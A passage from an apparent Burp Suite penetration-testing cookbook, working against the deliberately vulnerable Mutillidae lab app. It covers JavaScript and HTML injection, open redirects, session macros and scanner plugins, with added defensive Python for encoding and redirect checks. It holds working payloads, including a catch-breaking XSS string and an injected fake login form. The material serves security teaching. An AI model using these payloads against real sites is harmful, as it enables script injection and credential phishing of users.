        }// end catch
    }// end function onSubmitOfGeneratorForm(/*HTMLFormElement*/ theForm)
</script>

<div class="page-title">Password Generator</div>

<script type="text/javascript">
    $(function() {
        $('[HTMLEventReflectedXSSExecutionPoint]').attr("title", "");
        $('[HTMLEventReflectedXSSExecutionPoint]').balloon();
    });
</script>

<div style="margin: 5px;">
    <span style="font-weight: bold; margin-right: 50px;" HTMLEventReflectedXSSExecutionPoint="1">


4. Switch to the Burp Proxy Intercept tab. Turn Interceptor on with the button 
Intercept is on. 


5. Reload the Password Generator page in Firefox browser by pressing F5 or 
clicking the reload button. 


6. Switch to the Burp Proxy Interceptor tab. While the request is paused, note 
the username parameter value highlighted as follows: 


[Screenshot: Burp Proxy | Intercept tab, Intercept is on, request to http://192.168.56.101:80 with the username parameter value highlighted] 

GET /mutillidae/index.php?page=password-generator.php&username=anonymous HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=html5-storage.php
Cookie: showhints=1; PHPSESSID=9jsmn17vsn0mfe70ffv3vclkv1; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


7. Replace the preceding highlighted value of anonymous with the following 
carefully crafted JavaScript injection script: 


canary"; }catch(e){}alert(1);try{a=" 


8. Click the Forward button. Now, turn Interceptor off by clicking the toggle 
button to Intercept is off. 

9. Note the alert popup. You’ve successfully demonstrated the presence of a 
JavaScript injection XSS vulnerability! 


How it works... 


The JavaScript snippet injected into the web page matched the structure of the 
original catch statement. By creating a fake name of canary and ending the 
statement with a semicolon, a specially crafted new catch block was created, 
which contained the malicious JavaScript payload. 


Testing for HTML injection 


HTML injection is the insertion of arbitrary HTML code into a vulnerable web 
page. Vulnerabilities in this area may lead to the disclosure of sensitive 
information or the modification of page content for the purposes of socially 
engineering the user. 


Getting ready 


Using the OWASP Mutillidae II Capture Data Page, let's determine whether the 
application is susceptible to HTML injection attacks. 


How to do it... 


1. Navigate to OWASP 2013 | A1 — Injection (Other) | HTMLi Via Cookie 
Injection | Capture Data Page: 


[Screenshot: OWASP Mutillidae II menu (Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled, Not Logged In) with the path OWASP 2013 | A1 - Injection (Other) | HTMLi Via Cookie Injection | Capture Data Page selected] 


2. Note how the page looks before the attack: 


[Screenshot: Capture Data page (Back, Help Me!, View Captured Data)] 

Data Capture Page 

This page is designed to capture any parameters sent and store them in a file and a database table. It loops through the POST and GET parameters and records them to a file named captured-data.txt. On this system, the file should be found at /tmp/captured-data.txt. The page also tries to store the captured data in a database table named captured_data and logs the captured data. There is another page named captured-data.php that attempts to list the contents of this table. 

The data captured on this request is: page = capture-data.php showhints = 1 PHPSESSID = 9jsmn17vsn0mfe70ffv3vclkv1 acopendivids = swingset,jotto,phpbb2,redmine acgroupswithpersist = nada 

Would it be possible to hack the hacker? Assume the hacker will view the captured requests with a web browser. 


3. Switch to the Burp Proxy Intercept tab, and turn Interceptor on with the 
button Intercept is on. 

4. While the request is paused, make note of the last cookie, 
acgroupswithpersist=nada: 


[Screenshot: Burp Proxy | Intercept tab, Intercept is on, request to http://192.168.56.101:80 with the value of the last cookie highlighted] 

GET /mutillidae/index.php?page=capture-data.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=back-button-discussion.php
Cookie: showhints=1; PHPSESSID=9jsmn17vsn0mfe70ffv3vclkv1; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


5. While the request is paused, replace the value of the last cookie with this 
HTML injection script: 


<h1>Sorry, please login again</h1><br/>Username<input 
type="text"><br/>Password<input type="text"><br/><input 
type="submit" value="Submit"><h1>&nbsp;</h1> 


6. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 
7. Note how the HTML is now included inside the page! 


[Screenshot: the same Capture Data page (Back, Help Me!, Hints, View Captured Data) after the injection. The descriptive text is unchanged, but the captured acgroupswithpersist value now renders as a fake login form:] 

The data captured on this request is: page = capture-data.php showhints = 1 PHPSESSID = 9jsmn17vsn0mfe70ffv3vclkv1 acopendivids = swingset,jotto,phpbb2,redmine acgroupswithpersist = 

Sorry, please login again 

Username [text box] 
Password [text box] 
[Submit] 


How it works... 


Due to the lack of input validation and output encoding, an HTML injection 
vulnerability can exist. The result of exploiting this vulnerability is the insertion 
of arbitrary HTML code, which can lead to XSS attacks or social engineering 
schemes such as the one seen in the preceding recipe. 
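The DOM storage, JavaScript injection and HTML injection recipes above share one root cause: a value is written into the page in a context (the HTML body, or a JavaScript string literal) without encoding for that context. The added Python example below, which is not code from the book or from Mutillidae, renders the two payloads from these recipes through a vulnerable and a context-encoded template, and includes a small check that reports whether a value can terminate a JavaScript string literal. The try/catch template is a constructed model of the catch block the Password Generator recipe targets, not Mutillidae's actual source.

```python
import html
import json

# Payloads from the recipes above, kept as constructed test input.
HTML_PAYLOAD = ('<h1>Sorry, please login again</h1><br/>Username<input type="text">'
                '<br/>Password<input type="text"><br/><input type="submit" value="Submit">')
JS_PAYLOAD = 'canary"; }catch(e){}alert(1);try{a="'


def render_captured_vulnerable(name, value):
    """Echo a captured parameter straight into the page body, as the Capture
    Data page does; any markup in the value becomes part of the document."""
    return name + " = " + value


def render_captured_safe(name, value):
    """Same output with HTML entity encoding: the markup survives only as text."""
    return name + " = " + html.escape(value, quote=True)


def render_js_vulnerable(username):
    """Constructed template (an assumption, not Mutillidae's code) that drops a
    value into a JavaScript string literal inside a try/catch."""
    return ('try{ var lUsername = "' + username + '"; }'
            'catch(e){ alert("Error: " + e.message); }')


def render_js_safe(username):
    """json.dumps yields a valid JS string literal with quotes and backslashes
    escaped; <, > and & are additionally unicode-escaped so the literal can
    never contain </script> or start an HTML comment."""
    literal = (json.dumps(username)
               .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))
    return ('try{ var lUsername = ' + literal + '; }'
            'catch(e){ alert("Error: " + e.message); }')


def js_literal_body(username):
    """The escaped characters render_js_safe places between the quotes."""
    return json.dumps(username)[1:-1]


def terminates_js_string(chars):
    """Given the characters placed after an opening double quote, report whether
    an unescaped double quote appears, i.e. whether the value ends the literal
    early and the remainder runs as code. Handy as a unit test for templates."""
    escaped = False
    for ch in chars:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == '"':
            return True
    return False


if __name__ == "__main__":
    print(render_captured_vulnerable("acgroupswithpersist", HTML_PAYLOAD))
    print(render_captured_safe("acgroupswithpersist", HTML_PAYLOAD))
    print(render_js_vulnerable(JS_PAYLOAD))
    print(render_js_safe(JS_PAYLOAD))
```

Run side by side, the vulnerable JavaScript output contains the recipe's `}catch(e){}alert(1);` as live code, while the encoded output keeps the whole value inside one string literal; the same distinction applies to the reflected User-Agent in the DOM storage recipe, where entity encoding would have left the injected script inert.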


Testing for client-side resource manipulation 


If an application performs actions based on client-side URL information or 
a client-side path to a resource (that is, an AJAX call, an external JavaScript file, or an 
iframe source), the result can be a client-side resource manipulation vulnerability. This 
vulnerability relates to attacker-controlled URLs in, for example, the JavaScript 
location attribute, the Location header found in an HTTP response, or a POST 
body parameter that controls redirection. The impact of this vulnerability 
could lead to a cross-site scripting attack. 
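As an added example (not the book's or Mutillidae's code), the Python below shows the server-side check that an open redirect such as the one in this recipe lacks: the forwardurl value is accepted only when it is a path on the application or an absolute http(s) URL to an allowlisted host, and the same check is run over constructed access-log lines to flag redirect attempts to other hosts. The allowlist, the fallback page and the log lines are assumptions; the host 192.168.56.101 and www.issa-kentuckiana.org come from the recipe.

```python
from urllib.parse import parse_qs, urlsplit

APP_HOST = "192.168.56.101"                             # the lab host from the recipe
ALLOWED_REDIRECT_HOSTS = {"www.issa-kentuckiana.org"}   # constructed allowlist of link targets
SAFE_FALLBACK = "/mutillidae/index.php?page=home.php"   # assumed known-good landing page


def is_safe_redirect(forwardurl, app_host=APP_HOST, allowed_hosts=ALLOWED_REDIRECT_HOSTS):
    """True only for a path on this application (one leading slash) or an
    absolute http(s) URL whose host is on the allowlist. Rejects scheme-relative
    //host URLs, userinfo tricks (trusted@evil), backslashes, whitespace,
    control characters and non-http schemes such as javascript:."""
    if not forwardurl or any(ch in forwardurl for ch in "\\\r\n\t\x00 "):
        return False
    try:
        parts = urlsplit(forwardurl)
    except ValueError:
        return False
    if not parts.scheme and not parts.netloc:
        return forwardurl.startswith("/") and not forwardurl.startswith("//")
    if parts.scheme not in ("http", "https") or "@" in parts.netloc:
        return False
    host = (parts.hostname or "").lower()
    return host == app_host or host in allowed_hosts


def resolve_redirect(forwardurl):
    """What the redirecting page should put in Location: the requested target
    when it passes the check, otherwise a known-good page on the application."""
    return forwardurl if is_safe_redirect(forwardurl) else SAFE_FALLBACK


def flag_redirect_requests(log_lines):
    """Detection: return the forwardurl values in constructed access-log lines
    that fail the check, i.e. redirect attempts to hosts outside the allowlist."""
    flagged = []
    for line in log_lines:
        try:
            request_target = line.split('"')[1].split()[1]   # "GET <target> HTTP/1.1"
        except IndexError:
            continue
        query = parse_qs(urlsplit(request_target).query)
        for target in query.get("forwardurl", []):
            if not is_safe_redirect(target):
                flagged.append(target)
    return flagged


# Constructed log lines in combined-log style: one legitimate redirect to the
# Credits-page link, followed by two attempts to send the user elsewhere.
SAMPLE_LOG = [
    '192.168.56.1 - - [01/Jan/2019:10:00:00 +0000] "GET /mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.issa-kentuckiana.org HTTP/1.1" 302 0',
    '192.168.56.1 - - [01/Jan/2019:10:00:05 +0000] "GET /mutillidae/index.php?page=redirectandlog.php&forwardurl=http://evil.example/login HTTP/1.1" 302 0',
    '192.168.56.1 - - [01/Jan/2019:10:00:09 +0000] "GET /mutillidae/index.php?page=redirectandlog.php&forwardurl=//evil.example HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print(resolve_redirect("http://evil.example/"))
    print(flag_redirect_requests(SAMPLE_LOG))
```

An allowlist of hosts is preferable to a pattern match on the URL text because the userinfo, scheme-relative and backslash forms all look like the trusted host to a naive substring check while resolving somewhere else in the browser.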


Getting ready 


Using the OWASP Mutillidae II application, determine whether it is possible to 
manipulate any URL parameters that are exposed on the client side and whether 
the manipulation of those values causes the application to behave differently. 


How to do it... 


1. Navigate to OWASP 2013 | A10 — Unvalidated Redirects and Forwards | 
Credits: 


[Screenshot: OWASP Mutillidae II menu (Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled) with the path OWASP 2013 | A10 - Unvalidated Redirects and Forwards | Credits selected; the OWASP 2013 submenu lists A1 - Injection (SQL), A1 - Injection (Other), A2 - Broken Authentication and Session Management, A3 - Cross Site Scripting (XSS), A4 - Insecure Direct Object References, A5 - Security Misconfiguration, A6 - Sensitive Data Exposure, A7 - Missing Function Level Access Control, A8 - Cross Site Request Forgery (CSRF), A9 - Using Components with Known Vulnerabilities and A10 - Unvalidated Redirects and Forwards] 


2. Click the ISSA Kentuckiana link available on the Credits page: 


[Screenshot: Credits page with links to OWASP, ISSA Kentuckiana, OWASP Louisville and Helpful Firefox Add-Ons]


3. Switch to the Burp Proxy HTTP history tab, and find your request to the 
Credits page. Note that there are two query string 
parameters: page and forwardurl. What would happen if we manipulated 
the URL where the user is sent? 


[Screenshot: Proxy | HTTP history showing the request 
GET /mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.issa-kentuckiana.org HTTP/1.1 
to Host 192.168.56.101, with Referer http://192.168.56.101/mutillidae/index.php?page=credits.php] 


4. Switch to the Burp Proxy Intercept tab. Turn Interceptor on with the button 
Intercept is on. 


5. While the request is paused, note the current value of the forwardurl 
parameter: 


[Screenshot: Proxy | Intercept tab with Intercept is on, pausing the request 
GET /mutillidae/index.php?page=redirectandlog.php... to Host 192.168.56.101] 


6. Replace the value of the forwardurl parameter to be 
https://www.owasp.org instead of the original choice of 
http://www.issa-kentuckiana.org: 


[Screenshot: the intercepted request to 192.168.56.101 with the forwardurl 
parameter of GET /mutillidae/index.php?page=redirectandlog.php changed to https://www.owasp.org] 


7. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 


8. Note how we were redirected to a site other than the one originally clicked! 
How it works... 


Application code decisions, such as where to redirect a user, should never rely 
on client-side available values. Such values can be tampered with and modified, 
to redirect users to attacker-controlled websites or to execute attacker-controlled 
scripts. 
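The redirect decision behind redirectandlog.php, written first the way the recipe exploits it and then hardened server-side. This is an added example, not Mutillidae's own code; the allow-list, the key table and the fallback path are constructed for it.

```python
"""Added example (not Mutillidae's code): the redirect decision the recipe
tampers with, written the vulnerable way and then hardened."""
from urllib.parse import urlsplit, urlunsplit

# Constructed: where to land when the requested destination is refused.
FALLBACK = "/mutillidae/index.php?page=credits.php"

# Constructed allow-list of the external sites the Credits page links to.
ALLOWED_HOSTS = {"www.issa-kentuckiana.org", "www.owasp.org"}

# Constructed indirect-reference table: the page links ?forward=issa instead
# of a full URL, so no destination URL ever arrives from the client.
FORWARD_KEYS = {
    "issa": "http://www.issa-kentuckiana.org/",
    "owasp": "https://www.owasp.org/",
}


def redirect_target_vulnerable(forwardurl):
    """What the recipe shows: the client-supplied forwardurl value becomes the
    Location header unchanged, so any destination can be substituted."""
    return forwardurl


def redirect_target_hardened(forwardurl, allowed_hosts=ALLOWED_HOSTS):
    """Validate the client-supplied URL on the server before using it.

    Accept only absolute http(s) URLs whose host is on the allow-list, and
    rebuild the URL from its parsed parts so user-info, fragments and other
    oddities do not survive into the Location header."""
    try:
        parts = urlsplit(forwardurl.strip())
        port = parts.port                      # raises ValueError on a bad port
    except ValueError:
        return FALLBACK
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if scheme not in ("http", "https"):
        return FALLBACK        # refuses javascript:, data: and scheme-relative //host
    if host not in allowed_hosts:
        return FALLBACK        # refuses other hosts, including user@host tricks
    netloc = host if port is None else f"{host}:{port}"
    return urlunsplit((scheme, netloc, parts.path or "/", parts.query, ""))


def redirect_target_by_key(key, table=FORWARD_KEYS):
    """Strongest option: the client sends a key and the server owns the URLs."""
    return table.get(key, FALLBACK)


if __name__ == "__main__":
    for candidate in ("http://www.issa-kentuckiana.org", "https://www.owasp.org",
                      "https://evil.example/", "//evil.example",
                      "http://www.owasp.org@evil.example/"):
        print(f"{candidate!r:45} -> {redirect_target_hardened(candidate)}")
```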


Working with Burp Macros and Extensions 


In this chapter, we will cover the following recipes: 


- Creating session-handling macros 
- Getting caught in the cookie jar 
- Adding great pentester plugins 
- Creating new issues via Manual-Scan Issue Extension 
- Working with Active Scan++ Extension 


Introduction 


This chapter covers two separate topics that can also be blended together: 
macros and extensions. Burp macros enable penetration testers to automate 
events, such as logins or parameter reads, to overcome potential error situations. 
Extensions, also known as plugins, extend the core functionality found in Burp. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


- OWASP Broken Web Applications (VM) 
- OWASP Mutillidae (http://<Your_VM_Assigned_IP_Address>/mutillidae) 
- GetBoo (http://<Your_VM_Assigned_IP_Address>/getboo) 
- Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Creating session-handling macros 


In Burp, the Project options tab allows testers to set up session-handling rules. A 
session-handling rule allows a tester to specify a set of actions Burp will take in 
relation to session tokens or CSRF tokens while making HTTP Requests. There 
is a default session-handling rule in scope for Spider and Scanner. However, in 
this recipe, we will create a new session-handling rule and use a macro to help us 
create an authenticated session from an unauthenticated one while using 
Repeater. 


Getting ready 


Using the OWASP Mutillidae II application, we will create a new Burp 
Session-Handling rule, with an associated macro, to create an authenticated 
session from an unauthenticated one while using Repeater. 


How to do it... 


1. Navigate to the Login page in Mutillidae. Log into the application as 
username ed with password pentest. 

2. Immediately log out of the application by clicking the Logout button and 
make sure the application confirms you are logged out. 

3. Switch to the Burp Proxy HTTP history tab. Look for the logout request 
you just made along with the subsequent, unauthenticated GET request. 
Select the unauthenticated request, which is the second GET. Right-click and 
send that request to Repeater, as follows: 


[Screenshot: Proxy | HTTP history, right-click menu on the unauthenticated GET request with Send to Repeater]


4. Switch to Burp Repeater, then click the Go button. On the Render tab of the 
response, ensure you receive the Not Logged In message. We will use this 
scenario to build a session-handling rule to address the unauthenticated 
session and make it an authenticated one, as follows: 


[Screenshot: Repeater, Render tab of the response, showing Not Logged In] 


5. Switch to the Burp Project options tab, then the Sessions tab, and click the 
Add button under the Session Handling Rules section, as follows: 


[Screenshot: Project options | Sessions tab, Session Handling Rules section with the Add, Edit, Remove and Duplicate buttons and the Open sessions tracer link] 


6. After clicking the Add button, a pop-up box appears. Give your new rule a 
name, such as LogInSessionRule, and, under Rule Actions, select Run a 
macro, as follows: 


[Screenshot: Session handling rule editor. Rule Description: LogInSessionRule. Rule Actions menu: Use cookies from the session handling cookie jar, Set a specific cookie or parameter value, Check session is valid, Run a macro, Run a post-request macro, Invoke a Burp extension] 


7. Another pop-up box appears, which is the Session handling action editor. In 
the first section, under Select macro, click the Add button, as follows: 


[Screenshot: Session handling action editor for LogInSessionRule. Select macro (Add button); options to update the current request with parameters matched from the final macro response and with cookies from the session handling cookie jar; note that the request currently being processed by this session handling rule will still be issued, so the macro should not include this request unless it is necessary to issue it twice] 


8. After clicking the Add button, the macro editor appears along with another 
pop-up of the Macro Recorder, as follows: 


[Screenshot: Macro Recorder. Select the items from the proxy history that you wish to include in the macro, and click "OK". Note that to record a macro now using your browser you will need to ensure that proxy interception is turned off.] 

#  Host                   Method  URL                                          Params  Status  Length  MIME type  Extension 
1  http://192.168.56.101  GET     /mutillidae/index.php?do=logout              v       302     733     HTML       php 
2  http://192.168.56.101  GET     /mutillidae/index.php?page=login.php&p...    v       200     47756   HTML       php 
3  http://192.168.56.101  POST    /mutillidae/index.php?page=login.php         v       302     47478   HTML       php 
4  http://192.168.56.101  GET     /mutillidae/index.php?popUpNotification...   v       200     46417   HTML       php 


Note: A bug exists in 1.7.35 that disables Macro Recorder. Therefore, after 
clicking the Add button, if the recorder does not appear, upgrade the Burp 
version to 1.7.36 or higher. 


9. Inside the Macro Recorder, look for the POST request where you logged in 
as Ed as well as the following GET request. Highlight both of those requests 
within the Macro Recorder window and click OK, as follows: 


[Screenshot: Macro Recorder with the POST login request and the following GET /mutillidae/index.php?popUpNotificationCode=AUL request highlighted] 


10. Those two highlighted requests in the previous dialog box now appear 
inside the Macro Editor window. Give the macro a description, such as 
LogInMacro, as follows: 


[Screenshot: Macro Editor. Macro description: LogInMacro. Macro items: the first is POST /mutillidae/index.php?page=login.php HTTP/1.1 with Content-Type: application/x-www-form-urlencoded; buttons Configure item and Test macro] 


11. Click the Configure item button to validate that the username and password 
values are correct. Click OK when done, as follows: 


[Screenshot: Configure Macro Item dialog for the POST request to http://192.168.56.101/mutillidae/index.php?page=login.php. Cookie handling: Add cookies received in responses to the session handling cookie jar; Use cookies from the session handling cookie jar in requests. Parameter handling and Custom parameter locations in response sections] 


12. Click OK to close the Macro Editor. You should see the newly-created 
macro in the Session handling action editor. Click OK to close this dialog 
window, as follows: 


[Screenshot: Session handling action editor for LogInSessionRule with the new macro selected under Select macro] 


13. After closing the Session handling action editor, you are returned to the 
Session handling rule editor where you now see the Rule Actions section 
populated with the name of your macro. Click the Scope tab of this window 
to define which tool will use this rule: 


[Screenshot: Session handling rule editor, Details tab. Rule Description: LogInSessionRule. Rule Actions: run macro: LogInMacro] 


14. On the Scope tab of the Session handling rule editor, uncheck the other 
boxes, leaving only the Repeater checked. Under URL Scope, click the 
Include all URLs radio button. Click OK to close this editor, as follows: 


[Screenshot: Session handling rule editor, Scope tab. Tools Scope: only Repeater checked (Target, Scanner, Spider, Intruder, Sequencer, Extender and Proxy unchecked). URL Scope: Include all URLs. Parameter Scope: not restricted] 


15. You should now see the new session-handling rule listed in the Session 
Handling Rules window, as follows: 


[Screenshot: Session Handling Rules list showing the default rule (Use cookies from Burp's cookie jar, Tools: Spider and Scanner) and the new rule] 


16. Return to the Repeater tab where you were previously not logged in to the 
application. Click the Go button to reveal that you are now logged in as Ed! 
This means your session-handling rule and associated macro worked: 


[Screenshot: Repeater, Render tab of the response to GET /mutillidae/index.php?page=home.php&popUpNotificationCode=HPHO, showing Logged In User: ed] 


How it works... 


In this recipe, we saw how an unauthenticated session can be changed to an 
authenticated one by replaying the login process. The creation of macros allows 
manual steps to be scripted and assigned to various tools within the Burp suite. 


Burp allows testers to configure session-handling rules to address various 
conditions that the suite of tools may encounter. The rules provide additional 
actions to be taken when those conditions are met. In this recipe, we addressed 
an unauthenticated session by creating a new session-handling rule, which called 
a macro. We confined the scope for this rule to Repeater only for demonstration 
purposes. 
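What LogInSessionRule and LogInMacro do, modelled in code as an added example that is not Burp's own: a shared cookie jar, a session-validity check on the response body, and a login macro replayed before the original request is reissued. The server is a constructed stand-in that mimics only the Mutillidae paths and the ed/pentest account used in the recipe.

```python
"""Added example (not Burp code): a session-handling rule that runs a login
macro when a response comes back "Not Logged In"."""
import http.cookies
import secrets
import threading
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the Mutillidae login flow (same paths and account
# as the recipe, but a toy server, not Mutillidae).
LOGIN_PATH = "/mutillidae/index.php?page=login.php"
HOME_PATH = "/mutillidae/index.php?page=home.php"
VALID_USER, VALID_PASS = "ed", "pentest"
SESSIONS = {}  # PHPSESSID value -> username (server-side session store)


class MockMutillidae(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the example quiet
        pass

    def _current_user(self):
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        sid = jar["PHPSESSID"].value if "PHPSESSID" in jar else None
        return SESSIONS.get(sid)

    def do_GET(self):
        user = self._current_user()
        body = f"Logged In User: {user}" if user else "Not Logged In"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body.encode())

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if form.get("username") == [VALID_USER] and form.get("password") == [VALID_PASS]:
            sid = secrets.token_hex(13)           # fresh session id on login
            SESSIONS[sid] = VALID_USER
            self.send_response(302)               # the 302 seen in the Macro Recorder
            self.send_header("Set-Cookie", f"PHPSESSID={sid}; Path=/")
            self.send_header("Location", HOME_PATH)
        else:
            self.send_response(200)
        self.end_headers()


class LoginSessionRule:
    """Equivalent of the recipe's LogInSessionRule: a cookie jar shared by all
    requests, a session-validity check, and a LogInMacro that replays the
    login POST (plus the redirect GET) whenever the check fails."""

    def __init__(self, base_url):
        self.base_url = base_url
        self.cookie_jar = CookieJar()             # Burp's session handling cookie jar
        self.opener = urllib.request.build_opener(
            urllib.request.ProxyHandler({}),      # never route the toy server via a proxy
            urllib.request.HTTPCookieProcessor(self.cookie_jar))
        self.macro_runs = 0

    def _get(self, path):
        return self.opener.open(self.base_url + path).read().decode()

    def login_macro(self):
        form = urllib.parse.urlencode(
            {"username": VALID_USER, "password": VALID_PASS}).encode()
        # Cookies set on the 302 go into the jar; the redirect GET is issued
        # with them, like the second macro item in the recipe.
        self.opener.open(self.base_url + LOGIN_PATH, data=form).read()
        self.macro_runs += 1

    def session_is_valid(self, body):
        return "Not Logged In" not in body

    def request(self, path):
        body = self._get(path)
        if not self.session_is_valid(body):
            self.login_macro()                    # rule action: run a macro
            body = self._get(path)                # then issue the original request again
        return body

    def session_cookie(self):
        return next((c.value for c in self.cookie_jar if c.name == "PHPSESSID"), None)


def run_demo():
    """Start the toy server, send one unauthenticated request through the
    rule, and report what the tester would have seen at steps 4 and 16."""
    server = HTTPServer(("127.0.0.1", 0), MockMutillidae)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        rule = LoginSessionRule(f"http://127.0.0.1:{server.server_address[1]}")
        before = rule._get(HOME_PATH)             # plain Repeater request: Not Logged In
        after = rule.request(HOME_PATH)           # same request through the rule
        return {"before": before, "after": after,
                "macro_runs": rule.macro_runs,
                "session_cookie": rule.session_cookie()}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```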


Getting caught in the cookie jar 


While targeting an application, Burp captures all of the cookies it encounters 
while proxying and spidering HTTP traffic against a target site. Burp stores these 
cookies in a cache called the cookie jar. This cookie jar is used within the 
default session-handling rule and can be shared among the suite of Burp tools, 
such as Proxy, Intruder, and Spider. Inside the cookie jar, there is a historical 
table of requests. The table details each cookie domain and path. It is possible to 
edit or remove cookies from the cookie jar. 


Getting ready 


We will open the Burp Cookie Jar and look inside. Then, using the OWASP 
GetBoo application, we'll identify new cookies added to the Burp Cookie Jar. 


How to do it... 


1. Shut down and restart Burp so it is clean of any history. Switch to the Burp 
Project options tab, then the Sessions tab. In the Cookie Jar section, click 
the Open cookie jar button, as follows: 


[Screenshot: Project options | Sessions tab. Below the Session Handling Rules list (default rule: Use cookies from Burp's cookie jar, Spider and Scanner), the Cookie Jar section: Monitor the following tools' traffic to update the cookie jar, with Proxy and Spider checked, and the Open cookie jar button] 


2. A new pop-up box appears. Since we have no proxied traffic yet, the cookie 
jar is empty. Let's target an application and get some cookies captured, as 
follows: 


[Screenshot: empty Cookie jar viewer with columns Domain, Path, Name, Value, Expires and the Edit cookie, Remove cookie and Empty cookie jar buttons] 


3. From the OWASP Landing page, click the link to access the GetBoo 
application, as follows: 


[Screenshot: OWASP Broken Web Applications landing page, section Old (vulnerable) versions of real applications] 


4. Click the Login button. At the login screen, type both the username and 
password as demo, and then click the Log In button. 


5. Return to the Burp Cookie Jar. You now have three cookies available. Each 
cookie has a Domain, Path, Name, and Value identified, as follows: 


[Screenshot: Cookie jar viewer] 

Domain           Path  Name                 Value 
192.168.56.1...  /     PHPSESSID            (session token) 
192.168.56.1...  /     acopendivids         swingset,jotto,phpbb2,redmine 
192.168.56.1...  /     acgroupswithpersist  nada 


6. Select the last cookie in the list and click the Edit cookie button. Modify the 
value from nada to thisIsMyCookie and then click OK, as follows: 


[Screenshot: Cookie editor. Domain: 192.168.56.101, Name: acgroupswithpersist, Value: thisIsMyCookie] 


7. The value is now changed, as follows: 


[Screenshot: Cookie jar viewer showing the edited acgroupswithpersist cookie] 


8. The default scope for the Burp Cookie Jar is Proxy and Spider. However, 
you may expand the scope to include other tools. Click the checkbox for 
Repeater, as follows: 


[Screenshot: Cookie Jar section, Monitor the following tools' traffic to update the cookie jar, with Proxy, Spider and Repeater checked] 


Now, if you create a new session-handling rule and use the default Burp Cookie 
Jar, you will see the new value for that cookie used in the requests. 


How it works... 


The Burp Cookie Jar is used by session-handling rules for cookie-handling when 
automating requests against a target application. In this recipe, we looked into 
the Cookie Jar, understood its contents, and even modified one of the values of a 
captured cookie. Any subsequent session-handling rules that use the default 
Burp Cookie Jar will see the modified value in the request. 


Adding great pentester plugins 


As web-application testers, you will find handy tools to add to your repertoire to 
make your assessments more efficient. The Burp community offers many 
wonderful extensions. In this recipe, we will add a couple of them and explain 
how they can make your assessments better. The two plugins are Retire.js and 
Software Vulnerability Scanner; both run as part of the passive scanner. 


Note: Both of these plugins require the Burp Professional version. 


Getting ready 


Using the OWASP Mutillidae II application, we will add two handy extensions 
that will help us find more vulnerabilities in our target. 


How to do it... 


1. Switch to the Burp Extender tab. Go to the BApp Store and find two 
plugins—Retire.js and Software Vulnerability Scanner. Click the 
Install button for each plugin, as follows: 


[Screenshot: BApp Store with the Retire.js and Software Vulnerability Scanner entries] 


2. After installing the two plugins, go to the Extender tab, then Extensions, 
and then the Burp Extensions section. Make sure both plugins are enabled 
with check marks inside the check boxes. Also, notice the Software 
Vulnerability Scanner has a new tab, as follows: 


[Screenshot: Extender | Extensions tab, Burp Extensions list with Retire.js (Java) and Software Vulnerability Scanner loaded and enabled] 


3. Return to the Firefox browser and browse to the Mutillidae homepage. 
Perform a lightweight, less-invasive passive scan by right-clicking and 
selecting Passively scan this branch, as follows: 


[Screenshot: Target | Site map, right-click menu on http://192.168.56.104/mutillidae with Passively scan this branch] 


4. Note the additional findings created from the two plugins. The Vulners 
plugin, which is the Software Vulnerability Scanner, found numerous CVE 
issues, and Retire.js identified five instances of a vulnerable version of 
jQuery, as follows: 


[Screenshot: Scanner issues after Passively scan this branch] 

File path traversal [2] 
XPath injection 
Five jQuery findings from Retire.js: 
  /mutillidae/javascript/ddsmoothmenu/jquery.min.js 
  /mutillidae/javascript/ddsmoothmenu/jquery.min.js 
  /mutillidae/javascript/jQuery/jquery.js 
  /mutillidae/javascript/jQuery/jquery.js 
  /mutillidae/javascript/jQuery/jquery.js 
Password field with autocomplete enabled 
Client-side HTTP parameter pollution (reflected) [2] 
Input returned in response (reflected) [9] 
Cross-domain Referer leakage [3] 
[Vulners] Vulnerable Software detected 

Issue: [Vulners] Vulnerable Software detected 
Severity: High 
Confidence: Firm 
Host: http://192.168.56.104 
Path: /mutillidae/ 

Note: This issue was generated by a Burp extension. 

Issue detail 
The following vulnerabilities for software OpenSSL, headers - 0.9.8k found: 

OPENSSL: CVE-2014-0224 - 6.8 - Vulnerability in OpenSSL (CVE-2014-0224) 
An attacker can force the use of weak keying material in OpenSSL SSL/TLS 
clients and servers. This can be exploited by a Man-in-the-middle (MITM) 
